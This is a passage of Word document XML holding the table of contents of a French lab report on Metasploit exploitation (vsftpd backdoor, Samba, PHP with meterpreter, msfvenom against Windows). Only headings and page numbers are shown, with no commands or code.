        </w:p>
        <w:p w14:paraId="19BA469D" w14:textId="78641F9E" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957004" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Définitions et Avant-Propos :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957004 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A33B361" w14:textId="4179DDC8" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957005" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Premièrement, qu’est-ce qu’un exploit ?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957005 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C754882" w14:textId="6CB3002E" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957006" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Qu’est-ce que le payload ?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957006 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A6B8CE0" w14:textId="3A286D85" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957007" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>c)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vocabulaire important avant de commencer ce TP :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957007 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B084B90" w14:textId="5F6FF6D9" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957008" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Commençons Metasploit :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957008 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28479327" w14:textId="3D1FC6B0" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957009" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Partie avec msfvenom : Pirater Windows avec Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957009 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CE50FB7" w14:textId="79CE1BE4" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957010" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>II.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TP de Gelas et Begin :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957010 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A98C36F" w14:textId="74BA8DD8" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957011" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Exploit 1 : Exploitation d'une backdoor (vsftpd)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957011 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="318E5F01" w14:textId="2D62D73B" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957012" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>d)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nous avons bien un shell maintenant à disposition, ce qui indique une énorme compromission :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957012 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DDF6F7F" w14:textId="7B9A7AFB" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957013" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>e)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Récupération de la version hachée des mots de passes :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957013 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FC53593" w14:textId="06AB5D68" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957014" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>f)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Se créer un nouvel utilisateur pour plus tard :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957014 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BA52B76" w14:textId="55592739" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957015" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Exploitation d’un service Samba :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957015 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A810649" w14:textId="035CACDB" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957016" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3) Service Web Vulnerable (php + meterpreter)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957016 \h </w:instrText>
            </w:r>
